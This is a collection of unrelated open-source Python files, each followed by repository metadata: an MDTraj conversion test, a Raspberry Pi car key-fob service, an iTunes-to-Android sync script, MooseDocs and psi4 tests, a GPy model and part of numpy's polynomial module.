############################################################################## # MDTraj: A Python Library for Loading, Saving, and Manipulating # Molecular Dynamics Trajectories. # Copyright 2012-2013 Stanford University and the Authors # # Authors: Robert McGibbon # Contributors: # # MDTraj is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as # published by the Free Software Foundation, either version 2.1 # of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with MDTraj. If not, see <http://www.gnu.org/licenses/>. ############################################################################## """ Code to test the mdconvert script. These tests take about two minutes to run. This checks all pairs for formats, converting from format x -> format y. it also tries using striding to subsample the trajectory and atom_indices, so it does significant integration testing of the XXXTrajectoryFile modules as well. """ import os import sys import numpy as np import mdtraj as md from mdtraj import element from mdtraj.testing import eq import pytest import subprocess on_win = (sys.platform == 'win32') on_py3 = (sys.version_info >= (3, 0)) @pytest.fixture() def traj(tmpdir): xyz = np.around(np.random.randn(10, 5, 3).astype(np.float32), 2) topology = md.Topology() chain = topology.add_chain() residue = topology.add_residue('ALA', chain) topology.add_atom('CA', element.carbon, residue) topology.add_atom('HG1', element.hydrogen, residue) topology.add_atom('SG', element.sulfur, residue) topology.add_atom('OD1', element.oxygen, residue) topology.add_atom('NE', element.nitrogen, residue) time = np.arange(10) ** 2 unitcell_lengths = np.array([[1.1, 1.2, 1.3]] * 10) unitcell_angles = np.array([[90, 90, 95]] * 10) traj = md.Trajectory(xyz, topology=topology, time=time, unitcell_lengths=unitcell_lengths, unitcell_angles=unitcell_angles) fn = '{}/ref.h5'.format(tmpdir) traj.save(fn) return traj, fn, str(tmpdir) def test_index(traj): # Check that extracting a specific index works traj, in_fn, tmpdir = traj out_fn = '{}/frame4.pdb'.format(tmpdir) subprocess.check_call(['mdconvert', in_fn, '-i', '4', '-o', out_fn]) frame4 = md.load(out_fn) eq(frame4.xyz, traj[4].xyz) def test_slice(traj): # Check that extracting a specific slice works traj, in_fn, tmpdir = traj out_fn = '{}/frame13.pdb'.format(tmpdir) subprocess.check_call(['mdconvert', in_fn, '-i', '1:5:2', '-o', out_fn]) frame13 = md.load(out_fn) eq(frame13.xyz, traj[1:5:2].xyz) extensions = [ 'xtc', 'dcd', 'binpos', 'trr', 'nc', 'pdb', 'h5', 'lh5', 'netcdf' ] @pytest.fixture(params=extensions, ids=lambda x: 'from-' + x) def extension(request): if on_win and on_py3 and request.param == 'lh5': pytest.skip('No lh5 on windows py3') return request.param def test_pairwise(traj, extension): """ensure that the xyz coordinates are preserved by a trip from python -> save in format X -> mdconvert to format Y -> python """ traj, _, tmpdir = traj ext1 = extension # save one copy of traj for use as a topology file topology_fn = "{}/topology.pdb".format(tmpdir) traj[0].save(topology_fn) # save a .dat file for the atom_indices so that we can test # mdconvert's atom_indices flag atom_indices = np.array([0, 3]) atom_indices_fn = "{}/atom_indices.dat".format(tmpdir) np.savetxt(atom_indices_fn, atom_indices, fmt='%d') in_fn = "{}/traj.{}".format(tmpdir, ext1) traj.save(in_fn) working_dir = '{}/from-{}'.format(tmpdir, ext1) os.mkdir(working_dir) for ext2 in extensions: print(ext2) out_fn = 'traj.{}'.format(ext2) command1 = ['mdconvert', in_fn, '-o', out_fn, '-c 6'] if ext2 in ['pdb', 'h5', 'lh5']: # if we're saving a pdb or h5, we need to give it a topology too command1 += ['-t', topology_fn] # TODO: test fixture subprocess.check_call(command1, cwd=working_dir) # Use the --atom_indices flag to mdconvert command2 = command1 + ['-a', atom_indices_fn] command2[3] = 'subset.' + out_fn # make sure the output goes to a different file subprocess.check_call(command2, cwd=working_dir) # Use the --stride 3 flag command3 = command1 + ['-s 3'] command3[3] = 'stride.' + out_fn # change the out filename, so they don't clobbed subprocess.check_call(command3, cwd=working_dir) # ensure that the xyz coordinates are preserved by a trip # from python -> save in format X -> mdconvert to format Y -> python load_kwargs_check1 = {} load_kwargs_check2 = {} if ext2 not in ['pdb', 'h5', 'lh5']: load_kwargs_check1['top'] = traj.topology load_kwargs_check2['top'] = traj.topology.subset(atom_indices) out1 = md.load(os.path.join(working_dir, out_fn), **load_kwargs_check1) out2 = md.load(os.path.join(working_dir, 'subset.' + out_fn), **load_kwargs_check2) out3 = md.load(os.path.join(working_dir, 'stride.' + out_fn), **load_kwargs_check1) if ext1 in ['lh5'] or ext2 in ['lh5']: decimal = 3 else: decimal = 6 eq(out1.xyz, traj.xyz, decimal=decimal) eq(out2.xyz, traj.xyz[:, atom_indices], decimal=decimal) eq(out3.xyz, traj.xyz[::3], decimal=decimal) if ext1 not in ['binpos', 'lh5'] and ext2 not in ['binpos', 'lh5']: # binpos doesn't save unitcell information eq(out1.unitcell_vectors, traj.unitcell_vectors, decimal=2) eq(out2.unitcell_vectors, traj.unitcell_vectors, decimal=2) eq(out3.unitcell_vectors, traj.unitcell_vectors[::3], decimal=2) if all(e in ['xtc', 'trr', 'nc', 'h5'] for e in [ext1, ext2]): # these formats contain time information eq(out1.time, traj.time) eq(out2.time, traj.time) eq(out3.time, traj.time[::3]) if ext2 in ['pdb', 'h5', 'lh5']: # these formats contain a topology in the file that was # read from disk eq(out1.topology, traj.topology) eq(out2.topology, traj.topology.subset(atom_indices)) eq(out3.topology, traj.topology) def test_mdconvert_alanine(tmpdir, get_fn): command = ['mdconvert', get_fn('alanine-dipeptide-explicit.binpos'), '--top', get_fn('alanine-dipeptide-explicit.prmtop'), '-o', 'out.dcd'] subprocess.check_call(command, cwd=str(tmpdir)) t = md.load('{}/out.dcd'.format(tmpdir), top=get_fn('alanine-dipeptide-explicit.prmtop')) t2 = md.load(get_fn('alanine-dipeptide-explicit.binpos'), top=get_fn('alanine-dipeptide-explicit.prmtop')) eq(t.xyz, t2.xyz) eq(t.topology, t2.topology)
dwhswenson/mdtraj
tests/test_mdconvert.py
Python
lgpl-2.1
7,326
[ "MDTraj", "NetCDF" ]
c45db8aaffaaf35af89d9b1ed70189f37a97531831225946efee3829c587d658
#!/usr/bin/python # # Copyright (C) 2015, Jaguar Land Rover # # This program is licensed under the terms and conditions of the # Mozilla Public License, version 2.0. The full text of the # Mozilla Public License is at https://www.mozilla.org/MPL/2.0/ # # # Register a service specified by command line with an RVI node. # Print out a message when the service gets invoked. # import sys from rvilib import RVI import getopt import time import RPi.GPIO as GPIO from subprocess import call GPIO_UNLOCK = 5 GPIO_LOCK = 6 GPIO_LIGHTS = 13 GPIO_TRUNK = 19 GPIO_PANIC = 26 def usage(): print "Usage:", sys.argv[0], "[-n <rvi_url>]" print " <rvi_url> URL of Service Edge on a local RVI node." print " Default: http://localhost:8811" print print "The RVI Service Edge URL can be found in" print "[backend,vehicle].config as" print "env -> rvi -> components -> service_edge -> url" print print "The Service Edge URL is also logged as a notice when the" print "RVI node is started." print print "Example: ./fob.py -n http://rvi1.nginfotpdx.net:8801" sys.exit(255) # # Our general handler, registered with rvi.register_service() below. # # You can also explicitly name the arguments, but then # the sender has to match the argument names. # For example: # rvi_call.py http://localhost:8801 jlr.com/bt/test a=1 b=2 c=3 -> # def service(a,b,c) # def unlock_invoked(**args): GPIO.output(GPIO_UNLOCK, GPIO.HIGH) time.sleep( 0.3 ) GPIO.output(GPIO_UNLOCK, GPIO.LOW) return ['ok'] def lock_invoked(**args): GPIO.output(GPIO_LOCK, GPIO.HIGH) time.sleep( 0.3 ) GPIO.output(GPIO_LOCK, GPIO.LOW) return ['ok'] def lights_invoked(**args): GPIO.output(GPIO_LIGHTS, GPIO.HIGH) time.sleep( 0.3 ) GPIO.output(GPIO_LIGHTS, GPIO.LOW) return ['ok'] def trunk_invoked(**args): GPIO.output(GPIO_TRUNK, GPIO.HIGH) time.sleep( 0.3 ) GPIO.output(GPIO_TRUNK, GPIO.LOW) return ['ok'] def start_invoked(**args): print "Start not supported" return ['ok'] def stop_invoked(**args): print "Stop not supported" return ['ok'] def horn_invoked(**args): print "Horn not supported" return ['ok'] def panic_invoked(**args): GPIO.output(GPIO_PANIC, GPIO.HIGH) time.sleep( 0.3 ) # Longer? GPIO.output(GPIO_PANIC, GPIO.LOW) return ['ok'] def services_available(**args): print print "Services available!" print "args:", args print return ['ok'] def services_unavailable(**args): print "Services unavailable!" # Lock the door when BT connection goes away lock_invoked() return ['ok'] # # Check that we have the correct arguments # opts, args= getopt.getopt(sys.argv[1:], "n:") rvi_node_url = "http://localhost:8801" for o, a in opts: if o == "-n": rvi_node_url = a else: usage() if len(args) != 0: usage() # Setup GPIO pins GPIO.setmode(GPIO.BCM) GPIO.setup(GPIO_UNLOCK, GPIO.OUT) # unlock GPIO.setup(GPIO_LOCK, GPIO.OUT) # lock GPIO.setup(GPIO_LIGHTS, GPIO.OUT) # lights GPIO.setup(GPIO_TRUNK, GPIO.OUT) # trunk (weird) GPIO.setup(GPIO_PANIC, GPIO.OUT) # panic # # Setup initial state # GPIO.output(GPIO_UNLOCK, GPIO.LOW) GPIO.output(GPIO_LOCK, GPIO.LOW) GPIO.output(GPIO_LIGHTS, GPIO.LOW) GPIO.output(GPIO_TRUNK, GPIO.LOW) GPIO.output(GPIO_PANIC, GPIO.LOW) # Setup a connection to the local RVI node rvi = RVI(rvi_node_url) # Starting the thread that handles incoming calls is # not really necessary since register_service will do it for us. rvi.start_serve_thread() rvi.set_services_available_callback(services_available) rvi.set_services_unavailable_callback(services_unavailable) # Register our service and invoke 'service_invoked' if we # get an incoming JSON-RPC call to it from the RVI node # rvi.register_service("unlock", unlock_invoked) rvi.register_service("lock", lock_invoked) #rvi.register_service("start", start_invoked) #rvi.register_service("stop", stop_invoked) #rvi.register_service("horn", horn_invoked) rvi.register_service("trunk", trunk_invoked) rvi.register_service("panic", panic_invoked) rvi.register_service("lights", lights_invoked) while True: time.sleep(36000) sys.exit(0)
arod155/rvi-front-end
python/fob.py
Python
mpl-2.0
4,294
[ "Jaguar" ]
c523b68d0bc2e169b0671108ca2e9097a4e4b348a0347adba56d292dd3aa4917
import shell import prints import collections import os import re import time ### BEGIN CONFIGURATION OPTIONS ### # location of your itunes library # (or whatever directory you want to recursively transfer) ITUNES_LIBRARY = "/Users/chris/Music/iTunes/iTunes Media/Music/" GALAXY_LIBRARY = "/sdcard/Music/" # use "adb -d shell ls /" to find this # location of adb # mine was originally at: # ~/Downloads/adt-bundle-mac-x86_64-20140321/sdk/platform-tools/adb # I created a symlink for convenience, but this is not necessary. ADB = "/usr/local/bin/adb" # It often takes more than 1 try to connect to the device # the device is `offline` at first but wakes up after the # first attempt. 5 is a liberal number - 2 tries typically works. CONNECTION_TRIES = 5 DBG_REPORT = True # Whether to print a summary of the sync DBG_ERROR = True # Whether to print errors DBG_WARN = True # Whether to print warnings DBG_VERB = True # Whether to print a summary of every transaction ### END CONFIGURATION OPTIONS ### SHELL_ALIASES = {'adb': ADB, 'galaxy': '%s -d' % ADB, # Alias for sending commands to phone 'restart': '%s %s ; %s %s' % (ADB, 'kill-server', ADB, 'start-server')} DEVICE_STATES = collections.defaultdict(bool) DEVICE_STATES.update({ "offline": False, "device": True, "unauthorized": False, "no device": False, }) # Parses the serial numbers and states returned by "adb devices" DEVICE_REPORT_PATTERN = "\n([0-9\-a-zA-Z]+)\t(%s)" % ( '|'.join(DEVICE_STATES.keys())) # Shell interface - see shell.py. Global here but initialized in setup() SH = None def report(s): if DBG_REPORT: prints.stdout(s+'\n') def warn(s): if DBG_WARN: prints.stdout(s+'\n') def error(s): if DBG_ERROR: prints.stderr(s+'\n') def log(s): if DBG_VERB: prints.stdout(s+'\n') def i_to_g(s): """ Convert iTunes path to Galaxy filesystem location. Technically this could fail if you had some weird artist/album/song names, but if it did it would at least fail consistently. """ return s.replace(ITUNES_LIBRARY, GALAXY_LIBRARY) def g_to_i(s): return s.replace(GALAXY_LIBRARY, ITUNES_LIBRARY) def num_attached_devices(): """ Issue 'adb devices' command to find the number of connected devices """ res = SH.cmd('adb devices') devices = re.findall(DEVICE_REPORT_PATTERN, res) log = '\n'.join('Device #[%s] state: %s' %(serial,state) for serial, state in devices) status = None if len(devices) != 1 else DEVICE_STATES[devices[0][1]] return len(devices), log, status def check_num_devices(): """ Try to get a listing of devices, and return True if there's exactly 1. """ num_devices, log, status = num_attached_devices() tries = CONNECTION_TRIES while num_devices <= 0: if tries > 0: warn('Could not find your android device. Trying again...') elif tries == 0: report('Could not find your android device. Aborting') return False tries -= 1 time.sleep(2) SH.cmd('restart') time.sleep(2) # Give daemon some time to boot up num_devices, log, status = num_attached_devices() if num_devices > 1: error('Too many connected android devices - aborting.') error(log) return False return True def check_device_state(): num_devices, log, status = num_attached_devices() tries = CONNECTION_TRIES while not status: if tries > 0: warn('Device not online. Trying again.') elif tries == 0: error('Device is not online. Aborting.') return False tries -= 1 time.sleep(2) SH.cmd('restart') time.sleep(2) num_devices, log, status = num_attached_devices() return True def check_exists(string, flag): path = shell.escape(string) cmd = "if [ %s %s ]; then echo 'Exists'; else echo 'Not found'; fi" % ( flag, path) command = 'galaxy shell "%s"' % cmd aliased = SH.apply_aliases(command) res = SH.cmd(command) if 'Exists' in res: return True elif 'Not found' in res: return False else: error("Invalid result from command %s" % aliased) error(res) def g_has_dir(dirname): return check_exists(dirname, '-d') def g_has_file(filename): return check_exists(filename, '-f') def g_create_dir(dirname): res = SH.cmd('galaxy shell mkdir %s' % shell.escape(dirname)) if not g_has_dir(dirname): error("Failed to create directory: %s" % dirname) error(SH.apply_aliases('galaxy shell mkdir %s' % shell.escape(dirname))) error(res) else: log("Successfully created directory: %s" % dirname) def push_to(i_fname, g_dirname, g_filename): i_fname = shell.escape(i_fname) g_dirname = shell.escape(g_dirname) res = SH.cmd('galaxy push %(i_fname)s %(g_dirname)s' % locals()) if not g_has_file(g_filename): error("Failed to push file: %s" % g_filename) error(SH.apply_aliases('galaxy push %(i_fname)s %(g_dirname)s' % locals())) error(res) else: log("Successfully pushed %s to %s.\n" % (i_fname, g_dirname)) def setup(): if not os.path.exists(ITUNES_LIBRARY): error('Could not find itunes library: %s' % ITUNES_LIBRARY) return False if not os.path.exists(ADB): error('Could not find adb - maybe the location of your Android SDK changed?') error('adb = %s' % adb) return False global SH ; SH = shell.Shell(aliases=SHELL_ALIASES) SH.cmd('restart') return check_num_devices() and check_device_state() def sync_music(): if not setup(): exit(1) moved = 0 for root, dirs, files in os.walk(ITUNES_LIBRARY): groot = i_to_g(root) if not g_has_dir(groot): g_create_dir(groot) for i_filename in (os.path.join(root, fbase) for fbase in files): if os.path.basename(i_filename).startswith('.'): continue g_filename = i_to_g(i_filename) if not g_has_file(g_filename): push_to(i_filename, groot, g_filename) moved += 1 else: log("[%s] already on device" % g_filename) if moved > 0: report('Transfered %d music files from iTunes to Galaxy.' % moved) if __name__ == '__main__': sync_music()
bluquar/itunes_android_nofluff
sync_music.py
Python
mit
6,489
[ "Galaxy" ]
a54227c5a918869355d232543af0e3c67d0318b0c78af24b7ffd708c112b77dc
#!/usr/bin/env python3 #* This file is part of the MOOSE framework #* https://www.mooseframework.org #* #* All rights reserved, see COPYRIGHT for full restrictions #* https://github.com/idaholab/moose/blob/master/COPYRIGHT #* #* Licensed under LGPL 2.1, please see LICENSE for details #* https://www.gnu.org/licenses/lgpl-2.1.html import unittest import os import multiprocessing from MooseDocs import ROOT_DIR from MooseDocs.tree import pages class TestPage(unittest.TestCase): """ Tests for latex tree structure. """ def testPage(self): one = pages.Page('one', source='foo') self.assertEqual(one.name, 'one') self.assertEqual(one.source, 'foo') def testDirectory(self): node = pages.Directory('name', source='foo') self.assertEqual(node.source, 'foo') self.assertEqual(node.COLOR, 'CYAN') def testFile(self): source = os.path.join(ROOT_DIR, 'docs', 'content', 'utilities', 'MooseDocs', 'index.md') node = pages.File('foo', source=source) self.assertEqual(node.source, source) if __name__ == '__main__': unittest.main(verbosity=2)
nuclear-wizard/moose
python/MooseDocs/test/tree/test_page.py
Python
lgpl-2.1
1,142
[ "MOOSE" ]
56b9a8385d96477d8a9fcb4207441f93f1e251731ee6cb8a3d3a945b4d3afa88
# Copyright (c) 2012 - 2014 the GPy Austhors (see AUTHORS.txt) # Licensed under the BSD 3-clause license (see LICENSE.txt) import numpy as np from ..core import GP from .. import likelihoods from .. import kern from .. import util class GPCoregionalizedRegression(GP): """ Gaussian Process model for heteroscedastic multioutput regression This is a thin wrapper around the models.GP class, with a set of sensible defaults :param X_list: list of input observations corresponding to each output :type X_list: list of numpy arrays :param Y_list: list of observed values related to the different noise models :type Y_list: list of numpy arrays :param kernel: a GPy kernel, defaults to RBF ** Coregionalized :type kernel: None | GPy.kernel defaults :likelihoods_list: a list of likelihoods, defaults to list of Gaussian likelihoods :type likelihoods_list: None | a list GPy.likelihoods :param name: model name :type name: string :param W_rank: number tuples of the corregionalization parameters 'W' (see coregionalize kernel documentation) :type W_rank: integer :param kernel_name: name of the kernel :type kernel_name: string """ def __init__(self, X_list, Y_list, kernel=None, likelihoods_list=None, name='GPCR',W_rank=1,kernel_name='coreg'): #Input and Output X,Y,self.output_index = util.multioutput.build_XY(X_list,Y_list) Ny = len(Y_list) #Kernel if kernel is None: kernel = kern.RBF(X.shape[1]-1) kernel = util.multioutput.ICM(input_dim=X.shape[1]-1, num_outputs=Ny, kernel=kernel, W_rank=1,name=kernel_name) #Likelihood likelihood = util.multioutput.build_likelihood(Y_list,self.output_index,likelihoods_list) super(GPCoregionalizedRegression, self).__init__(X,Y,kernel,likelihood, Y_metadata={'output_index':self.output_index})
avehtari/GPy
GPy/models/gp_coregionalized_regression.py
Python
bsd-3-clause
1,917
[ "Gaussian" ]
94f44f0fcb4c8e7d075f6316f6130a2f6305de1fa310a38c4b1b156932e5380e
#! API access to CCSD amplitudes import numpy as np import psi4 Ne = psi4.geometry(""" 0 1 Ne 0.0 0.0 0.0 symmetry c1 """) psi4.set_options({'basis': 'cc-pvdz', 'freeze_core': 'false'}) _, wfn = psi4.energy('ccsd', return_wfn=True, molecule=Ne) amps = wfn.get_amplitudes() TIjAb = amps['tIjAb'].to_array() TIA = amps['tIA'].to_array() tau_IjAb = TIjAb + np.einsum("ia,jb->ijab", TIA, TIA) mints = psi4.core.MintsHelper(wfn.basisset()) D = mints.mo_eri( wfn.Ca_subset("AO", "OCC"), wfn.Ca_subset("AO", "VIR"), wfn.Ca_subset("AO", "OCC"), wfn.Ca_subset("AO", "VIR")).to_array() D = D.swapaxes(1, 2) RHF_ccsd_corr_e = 2 * np.einsum("ijab,ijab->", tau_IjAb, D) - np.einsum("ijab,ijba->", tau_IjAb, D) psi4.compare_values(RHF_ccsd_corr_e, psi4.variable('CCSD CORRELATION ENERGY'), 8, "RHF CCSD CORRELATION ENERGY") # END RHF psi4.core.clean() # UHF psi4.set_options({ 'basis': 'cc-pvdz', 'freeze_core': 'false', 'reference': 'UHF', }) _, wfn = psi4.energy('ccsd', return_wfn=True, molecule=Ne) amps = wfn.get_amplitudes() TIJAB = amps['tIJAB'].to_array() Tijab = amps['tijab'].to_array() TIjAb = amps['tIjAb'].to_array() Tia = amps['tia'].to_array() TIA = amps['tIA'].to_array() tauIJAB = TIJAB + np.einsum('IA,JB->IJAB', TIA, TIA) - np.einsum("IA,JB->IJBA", TIA, TIA) tauijab = Tijab + np.einsum('ia,jb->ijab', Tia, Tia) - np.einsum("ia,jb->ijba", Tia, Tia) tauIjAb = TIjAb + np.einsum('IA,jb->IjAb', TIA, Tia) CO = wfn.Ca_subset("AO", "OCC") Co = wfn.Cb_subset("AO", "OCC") CV = wfn.Ca_subset("AO", "VIR") Cv = wfn.Cb_subset("AO", "VIR") mints = psi4.core.MintsHelper(wfn.basisset()) D_IJAB = mints.mo_eri(CO, CV, CO, CV).to_array().swapaxes(1, 2) D_ijab = mints.mo_eri(Co, Cv, Co, Cv).to_array().swapaxes(1, 2) D_IjAb = mints.mo_eri(CO, CV, Co, Cv).to_array().swapaxes(1, 2) E2AA = 0.5 * np.einsum("IJAB,IJAB->", tauIJAB, D_IJAB) E2BB = 0.5 * np.einsum("ijab,ijab->", tauijab, D_ijab) E2AB = np.einsum("IjAb,IjAb->", tauIjAb, D_IjAb) UHF_ccsd_corr_e = E2AA + E2BB + E2AB psi4.compare_values(UHF_ccsd_corr_e, psi4.variable("CCSD CORRELATION ENERGY"), 8, "UHF CCSD CORRELATION ENERGY") # END UHF psi4.core.clean() # ROHF-semicanonical CN = psi4.geometry(""" units bohr 0 2 C 0.000000000000 0.000000000000 1.195736583480 N 0.000000000000 0.000000000000 -1.024692078304 symmetry c1 """) psi4.set_options({ 'basis': 'cc-pvdz', 'freeze_core': 'false', 'reference': 'ROHF', 'semicanonical': 'True', }) _, wfn = psi4.energy('ccsd', return_wfn=True, molecule=CN) amps = wfn.get_amplitudes() TIJAB = amps['tIJAB'].to_array() Tijab = amps['tijab'].to_array() TIjAb = amps['tIjAb'].to_array() Tia = amps['tia'].to_array() TIA = amps['tIA'].to_array() tauIJAB = TIJAB + np.einsum('IA,JB->IJAB', TIA, TIA) - np.einsum("IA,JB->IJBA", TIA, TIA) tauijab = Tijab + np.einsum('ia,jb->ijab', Tia, Tia) - np.einsum("ia,jb->ijba", Tia, Tia) tauIjAb = TIjAb + np.einsum('IA,jb->IjAb', TIA, Tia) CO = wfn.Ca_subset("AO", "OCC") Co = wfn.Cb_subset("AO", "OCC") CV = wfn.Ca_subset("AO", "VIR") Cv = wfn.Cb_subset("AO", "VIR") fIA = psi4.core.Matrix.triplet(CO, wfn.Fa(), CV, True, False, False).to_array() fia = psi4.core.Matrix.triplet(Co, wfn.Fb(), Cv, True, False, False).to_array() mints = psi4.core.MintsHelper(wfn.basisset()) D_IJAB = mints.mo_eri(CO, CV, CO, CV).to_array().swapaxes(1, 2) D_ijab = mints.mo_eri(Co, Cv, Co, Cv).to_array().swapaxes(1, 2) D_IjAb = mints.mo_eri(CO, CV, Co, Cv).to_array().swapaxes(1, 2) E1_A = np.einsum("IA,IA->", TIA, fIA) E1_B = np.einsum("ia,ia->", Tia, fia) E2AA = 0.5 * np.einsum("IJAB,IJAB->", tauIJAB, D_IJAB) E2BB = 0.5 * np.einsum("ijab,ijab->", tauijab, D_ijab) E2AB = np.einsum("IjAb,IjAb->", tauIjAb, D_IjAb) ROHF_ccsd_corr_e = E2AA + E2BB + E2AB + E1_A + E1_B psi4.compare_values(ROHF_ccsd_corr_e, psi4.variable("CCSD CORRELATION ENERGY"), 8, "ROHF CCSD CORRELATION ENERGY") # END ROHF
CDSherrill/psi4
samples/python/cc_amps/test.py
Python
lgpl-3.0
3,907
[ "Psi4" ]
9eed00e131ba098285281c10702ac9dc98df1b866f047f48b04738c7d0a0d254
""" Functions to operate on polynomials. """ from __future__ import division, absolute_import, print_function __all__ = ['poly', 'roots', 'polyint', 'polyder', 'polyadd', 'polysub', 'polymul', 'polydiv', 'polyval', 'poly1d', 'polyfit', 'RankWarning'] import re import warnings import numpy.core.numeric as NX from numpy.core import (isscalar, abs, finfo, atleast_1d, hstack, dot, array, ones) from numpy.lib.twodim_base import diag, vander from numpy.lib.function_base import trim_zeros from numpy.lib.type_check import iscomplex, real, imag, mintypecode from numpy.linalg import eigvals, lstsq, inv class RankWarning(UserWarning): """ Issued by `polyfit` when the Vandermonde matrix is rank deficient. For more information, a way to suppress the warning, and an example of `RankWarning` being issued, see `polyfit`. """ pass def poly(seq_of_zeros): """ Find the coefficients of a polynomial with the given sequence of roots. Returns the coefficients of the polynomial whose leading coefficient is one for the given sequence of zeros (multiple roots must be included in the sequence as many times as their multiplicity; see Examples). A square matrix (or array, which will be treated as a matrix) can also be given, in which case the coefficients of the characteristic polynomial of the matrix are returned. Parameters ---------- seq_of_zeros : array_like, shape (N,) or (N, N) A sequence of polynomial roots, or a square array or matrix object. Returns ------- c : ndarray 1D array of polynomial coefficients from highest to lowest degree: ``c[0] * x**(N) + c[1] * x**(N-1) + ... + c[N-1] * x + c[N]`` where c[0] always equals 1. Raises ------ ValueError If input is the wrong shape (the input must be a 1-D or square 2-D array). See Also -------- polyval : Compute polynomial values. roots : Return the roots of a polynomial. polyfit : Least squares polynomial fit. poly1d : A one-dimensional polynomial class. Notes ----- Specifying the roots of a polynomial still leaves one degree of freedom, typically represented by an undetermined leading coefficient. [1]_ In the case of this function, that coefficient - the first one in the returned array - is always taken as one. (If for some reason you have one other point, the only automatic way presently to leverage that information is to use ``polyfit``.) The characteristic polynomial, :math:`p_a(t)`, of an `n`-by-`n` matrix **A** is given by :math:`p_a(t) = \\mathrm{det}(t\\, \\mathbf{I} - \\mathbf{A})`, where **I** is the `n`-by-`n` identity matrix. [2]_ References ---------- .. [1] M. Sullivan and M. Sullivan, III, "Algebra and Trignometry, Enhanced With Graphing Utilities," Prentice-Hall, pg. 318, 1996. .. [2] G. Strang, "Linear Algebra and Its Applications, 2nd Edition," Academic Press, pg. 182, 1980. Examples -------- Given a sequence of a polynomial's zeros: >>> np.poly((0, 0, 0)) # Multiple root example array([1, 0, 0, 0]) The line above represents z**3 + 0*z**2 + 0*z + 0. >>> np.poly((-1./2, 0, 1./2)) array([ 1. , 0. , -0.25, 0. ]) The line above represents z**3 - z/4 >>> np.poly((np.random.random(1.)[0], 0, np.random.random(1.)[0])) array([ 1. , -0.77086955, 0.08618131, 0. ]) #random Given a square array object: >>> P = np.array([[0, 1./3], [-1./2, 0]]) >>> np.poly(P) array([ 1. , 0. , 0.16666667]) Or a square matrix object: >>> np.poly(np.matrix(P)) array([ 1. , 0. , 0.16666667]) Note how in all cases the leading coefficient is always 1. """ seq_of_zeros = atleast_1d(seq_of_zeros) sh = seq_of_zeros.shape if len(sh) == 2 and sh[0] == sh[1] and sh[0] != 0: seq_of_zeros = eigvals(seq_of_zeros) elif len(sh) == 1: dt = seq_of_zeros.dtype # Let object arrays slip through, e.g. for arbitrary precision if dt != object: seq_of_zeros = seq_of_zeros.astype(mintypecode(dt.char)) else: raise ValueError("input must be 1d or non-empty square 2d array.") if len(seq_of_zeros) == 0: return 1.0 dt = seq_of_zeros.dtype a = ones((1,), dtype=dt) for k in range(len(seq_of_zeros)): a = NX.convolve(a, array([1, -seq_of_zeros[k]], dtype=dt), mode='full') if issubclass(a.dtype.type, NX.complexfloating): # if complex roots are all complex conjugates, the roots are real. roots = NX.asarray(seq_of_zeros, complex) if NX.all(NX.sort(roots) == NX.sort(roots.conjugate())): a = a.real.copy() return a def roots(p): """ Return the roots of a polynomial with coefficients given in p. The values in the rank-1 array `p` are coefficients of a polynomial. If the length of `p` is n+1 then the polynomial is described by:: p[0] * x**n + p[1] * x**(n-1) + ... + p[n-1]*x + p[n] Parameters ---------- p : array_like Rank-1 array of polynomial coefficients. Returns ------- out : ndarray An array containing the complex roots of the polynomial. Raises ------ ValueError When `p` cannot be converted to a rank-1 array. See also -------- poly : Find the coefficients of a polynomial with a given sequence of roots. polyval : Compute polynomial values. polyfit : Least squares polynomial fit. poly1d : A one-dimensional polynomial class. Notes ----- The algorithm relies on computing the eigenvalues of the companion matrix [1]_. References ---------- .. [1] R. A. Horn & C. R. Johnson, *Matrix Analysis*. Cambridge, UK: Cambridge University Press, 1999, pp. 146-7. Examples -------- >>> coeff = [3.2, 2, 1] >>> np.roots(coeff) array([-0.3125+0.46351241j, -0.3125-0.46351241j]) """ # If input is scalar, this makes it an array p = atleast_1d(p) if len(p.shape) != 1: raise ValueError("Input must be a rank-1 array.") # find non-zero array entries non_zero = NX.nonzero(NX.ravel(p))[0] # Return an empty array if polynomial is all zeros if len(non_zero) == 0: return NX.array([]) # find the number of trailing zeros -- this is the number of roots at 0. trailing_zeros = len(p) - non_zero[-1] - 1 # strip leading and trailing zeros p = p[int(non_zero[0]):int(non_zero[-1])+1] # casting: if incoming array isn't floating point, make it floating point. if not issubclass(p.dtype.type, (NX.floating, NX.complexfloating)): p = p.astype(float) N = len(p) if N > 1: # build companion matrix and find its eigenvalues (the roots) A = diag(NX.ones((N-2,), p.dtype), -1) A[0,:] = -p[1:] / p[0] roots = eigvals(A) else: roots = NX.array([]) # tack any zeros onto the back of the array roots = hstack((roots, NX.zeros(trailing_zeros, roots.dtype))) return roots def polyint(p, m=1, k=None): """ Return an antiderivative (indefinite integral) of a polynomial. The returned order `m` antiderivative `P` of polynomial `p` satisfies :math:`\\frac{d^m}{dx^m}P(x) = p(x)` and is defined up to `m - 1` integration constants `k`. The constants determine the low-order polynomial part .. math:: \\frac{k_{m-1}}{0!} x^0 + \\ldots + \\frac{k_0}{(m-1)!}x^{m-1} of `P` so that :math:`P^{(j)}(0) = k_{m-j-1}`. Parameters ---------- p : array_like or poly1d Polynomial to differentiate. A sequence is interpreted as polynomial coefficients, see `poly1d`. m : int, optional Order of the antiderivative. (Default: 1) k : list of `m` scalars or scalar, optional Integration constants. They are given in the order of integration: those corresponding to highest-order terms come first. If ``None`` (default), all constants are assumed to be zero. If `m = 1`, a single scalar can be given instead of a list. See Also -------- polyder : derivative of a polynomial poly1d.integ : equivalent method Examples -------- The defining property of the antiderivative: >>> p = np.poly1d([1,1,1]) >>> P = np.polyint(p) >>> P poly1d([ 0.33333333, 0.5 , 1. , 0. ]) >>> np.polyder(P) == p True The integration constants default to zero, but can be specified: >>> P = np.polyint(p, 3) >>> P(0) 0.0 >>> np.polyder(P)(0) 0.0 >>> np.polyder(P, 2)(0) 0.0 >>> P = np.polyint(p, 3, k=[6,5,3]) >>> P poly1d([ 0.01666667, 0.04166667, 0.16666667, 3. , 5. , 3. ]) Note that 3 = 6 / 2!, and that the constants are given in the order of integrations. Constant of the highest-order polynomial term comes first: >>> np.polyder(P, 2)(0) 6.0 >>> np.polyder(P, 1)(0) 5.0 >>> P(0) 3.0 """ m = int(m) if m < 0: raise ValueError("Order of integral must be positive (see polyder)") if k is None: k = NX.zeros(m, float) k = 